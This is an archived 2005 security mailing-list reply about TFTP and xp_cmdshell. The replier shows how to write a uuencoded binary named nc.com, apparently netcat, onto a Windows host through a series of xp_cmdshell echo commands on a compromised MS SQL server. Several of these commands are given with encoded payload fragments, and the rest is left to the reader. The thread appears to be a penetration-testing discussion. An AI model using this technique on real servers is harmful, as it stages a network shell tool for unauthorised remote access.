Re: TFTP and XP_CMDSHELL - Weird

From: Javier Fernandez-Sanguino (jfernandez@germinus.com)
Date: Thu Jun 23 2005 - 13:24:02 EDT

• Next message: Tim Singletary: "RE: CEH training"
• Previous message: Thor (Hammer of God): "Re: Connecting to different services with source port 53"
• In reply to: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird - SOLVED"
• Reply: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird - SOLVED"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Andres Molinetti wrote:

> I think the problem is the tftp client. Does anyone know if MS has fixed
> it in anyway not to allow downloads from low-privileged users?? or
> something like that??

Why use tftp? You can just create an uuencode file that will
auto-decode itself when run. Try using

xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
xp_cmdshell 'echo
M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U
>>c:\nc.com'
xp_cmdshell 'echo
M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
(...)

and so on. I'll leave the rest up to you. There are some caveats when
you want to pull that through HTTP but it works everytime.

Regards

Javier

• Next message: Tim Singletary: "RE: CEH training"
• Previous message: Thor (Hammer of God): "Re: Connecting to different services with source port 53"
• In reply to: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird - SOLVED"
• Reply: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird - SOLVED"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT